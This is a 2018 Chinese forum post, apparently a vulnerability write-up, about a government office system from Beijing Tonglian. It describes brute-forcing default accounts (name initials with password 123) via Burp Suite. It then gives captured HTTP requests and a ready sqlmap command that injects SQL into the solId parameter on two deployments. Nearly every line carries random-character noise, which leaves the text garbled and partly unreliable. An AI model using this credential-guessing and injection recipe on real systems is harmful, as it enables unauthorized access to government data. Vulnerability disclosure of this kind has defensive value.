|
2 _2 {6 C& r; e3 i4 K4 y
* R6 F7 p. p0 a' q3 f) ]4 E * i: l/ p: C; V+ ^7 m+ Z) L
" s! X7 q. S% E. ~ 平台简介:
0 C0 W1 v& ^( V: a0 n3 A9 u# P 1 p8 I( d5 f) h) a. z' Y& p; y
6 o; q0 P7 O& b 3 P& G8 L* b" I
8 @+ P" |5 p5 I. H1 y# N) a+ S' }5 b4 y. O% ?5 j, v e
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 o. ~( _$ o0 f/ m8 n同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 J& }' `. X2 k2 T P+ R
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!" l3 O" |! E8 I4 L: v3 k0 Z
7 H- z- l7 h* Z
4 x) V8 | D% I/ e2 Y$ e0 {
1 _5 D+ L' U8 {5 a
2 M9 G% h; Q; y$ d! g% P
+ f2 g' c) Z b6 C2 f 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* f2 N* m1 y, n
5 C' ]' ^9 X4 `6 U4 r: t; q9 R1 V
) }6 {0 P3 T' V, A7 }7 U5 M
3 ^2 R( J, a7 d @. ^
4 }! V3 _$ Z1 @; e7 B1 W. F7 D) m+ y8 w% S2 @
http://1.1.1.1:7197/cap-aco/#(案例2-)
2 U' j- `3 i( G6 }: J * R$ j- p' Z. q% D
1 ] O z/ y: ?, _6 D; v# d1 j http://www.XXOO.com (案例1-官网网站)
8 D. p- O: P+ [( N) Y$ q: S; B $ T1 W6 b! d% f3 @3 W
9 O' b5 t3 w9 T2 I. }4 B- ~3 e$ d* g+ X
@7 V% I" q7 D0 A4 f) u " v- p. v& R; N7 t# I
4 ^% j4 ^& I' e- d- x* L" ^! u 漏洞详情:
! s: F: I4 B# |: p) y( \; { + b2 @: g& j0 k' ~. V) ~
1 ?# o: ^6 s3 J2 p& b8 p/ _
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
6 i* s, J% c2 R% U2 g, @ ! ?. P8 K8 M, [* N* g
$ {! [$ e, r5 E: K, l
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:- P5 U# ?9 t$ {( X6 v# H- I
( ?4 S9 y! ^/ e1 l! f8 y
0 H0 {. W& B* {
3 h/ G/ e* Z& E6 v% k7 i2 j / E) l5 A1 f, K: W# \$ P b' x
+ J" N( Q+ S* c" k 
7 \$ j2 g+ N0 w) r% a* l+ h 1 L, ^- w' v2 d9 g2 V: [( N) x/ h
; b7 g" S: X, g, X status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:* \1 G* \7 r- w1 h
( o9 i1 c( {# T0 w: @0 i
* o W! C6 z; a) B& s. H' W' ?$ G 1、案例1-官方网站$ P$ \( H( [7 K6 ]
* r0 d* |# j0 h
- k7 H4 b7 g. ]" @% g, |- a+ ?
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.18 k5 A2 w: S" i4 M5 x
0 O! T# ?. f; p4 \( V( M
+ v; W% C( [% z" W+ Y4 u D2 ^$ ^9 s Host: www.XXOO.com
# i0 M# o8 Q- _& i, I/ B% H
9 i6 u3 X+ J- e% l- q! p
3 }) X8 f4 k d D* d Proxy-Connection: Keep-Alive
! Q9 ]0 R9 y0 l9 Q5 x+ L 8 _3 r, Y4 U/ u* N
! y |# f; f8 u; V: r' g- E s+ Q Accept: application/json, text/javascript, */*; q=0.01
$ J1 ^1 P6 N5 p& o
. Z% ]7 H9 m& B! w( v
4 {( R- S! x. s+ p0 K w7 |+ s Accept-Language: zh-CN6 b4 V+ j, G! {( o5 Z, @: P1 e
5 e" p L4 y' V% k2 c! k) u
& S8 u4 i( S |5 D# d Content-Type: application/json
" @- Q8 p. b' Q0 T+ b; t & S1 _7 a# d- o1 d( e
+ \: U# x# v8 ` P( q1 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
( Z) n* g& L2 d6 J; i' t8 R
" `0 v6 y* ?0 K. p2 P& g0 L$ w2 k1 w+ V1 d
X-Requested-With: XMLHttpRequest% s9 I9 l; @3 B" \. u8 D1 q
+ l: b8 _! |* w( p" ^8 H3 r
8 ^& X" ^+ m! {8 u6 f Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
& B) {2 b0 p: f s1 ^# e% C; q! Z * C3 E0 c& L- U: m$ k- ^
/ M# x7 F$ Q( m% q# w/ V% Q: b Accept-Encoding: gzip, deflate, sdch
( R' p4 d" a! U + P9 t& m u I% \: _# d2 j
g8 d7 q1 K, R6 D0 e6 i( z
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
& x+ `% c7 ^* J) l/ v% u
$ p1 T; F4 G5 e+ J! u g; {+ R; E; R# Z( A9 k/ ]
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" _& B& m4 U" {
# |/ y# X0 `- {8 Z0 j3 L Z+ {/ y% ^# r
 % }, |9 ]$ o% j& Q) E' _3 c3 C
: U* ?1 ? x$ s7 k1 r: k
1 F1 v* d+ x v0 I# q 
# G2 i: Q! q) z1 B* v4 x1 o
/ s" d5 H- _+ F. [" r1 {! [4 x1 L7 X4 Z) V
- H" x- ~) e2 K3 u" o9 I; ^
1 Q) `( y; c3 q/ i0 }- f; _/ n9 D& j& O- m2 R1 D1 p- i6 s4 l$ n
& S% P; O' o; n% _9 d8 B s
" I6 |, Y$ s- R& g7 U( @/ i# t
' a. m8 v- X& n% `' ~% ?3 R0 n7 s
9 S* p% A0 D& K) f9 e4 I% Q0 t
' x/ ^: S( k' {) _/ M; ]1 C2 J# C: _
- G1 S2 v' {, ^+ a" L 2、案例2-某天河云平台
; I. {) h) D+ s " _% d! j h6 Z) |: m! r
7 b9 ^; V9 U/ Y5 d8 u
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1+ n- o9 U9 b3 e4 M
6 e6 O$ l7 Z# h( r+ s
2 m0 G- B l& s, V2 M9 n Host: 1.1.1.:7197
8 }. V7 e# A# B 9 ~6 O2 \1 E" y" U
& y5 n6 L; K- b. a* j
Accept: application/json, text/javascript, */*; q=0.015 i7 X7 H( ? ~3 T( A7 Y* ^
' u' r: x! L) u6 q5 P0 x/ D2 V! l. w
3 m4 p3 @3 R) X' _ X-Requested-With: XMLHttpRequest8 }; J) Q! F+ g1 L# t8 c f7 l
" ]$ O/ ` r, h$ a. v
/ K' B. y+ T( u& @" d User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.06 ^. Z8 M; e; Y8 _
( }7 Q0 L$ S+ D, k: K/ y! |# u; C+ [( Y7 a, H
Content-Type: application/json6 Z% z" t4 D. {0 A( k
5 F' z9 o$ a+ Y$ g1 j" s2 @. s! k5 ^( k* \
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
3 m, }4 e3 G1 w8 H: Q ' _0 {2 w3 l' T8 d6 G1 v
$ O8 r% M+ R) ^, \. s
Accept-Language: zh-CN,zh;q=0.8 y% }; [2 B, J8 x
6 f; p( H0 p4 b8 Q! q2 [7 u+ L
1 L: c- p6 i+ {
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=19 D& E+ |5 A1 A# d$ ~3 c
& X- ^9 }' m, W* p
+ l& U9 B+ W+ B9 \/ A0 B
Connection: close
% i3 B' a* F7 V4 x * m, W& @' J- x3 n
* A0 S0 ?0 H, K _3 f
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:- C# f( Z& m% K7 k7 t3 g+ b* s# }
( }; p+ N7 L6 I; V/ O$ u
( H+ y" ^+ a6 S 
) r- f W, X2 P& ?* m) S8 O5 I 1 K( N) B3 t" t, C
' U! y0 n! H7 P9 `/ x
2 H/ K* S5 z; X: P | 
发表于 2018-10-20 20:15:17
收藏
支持
反对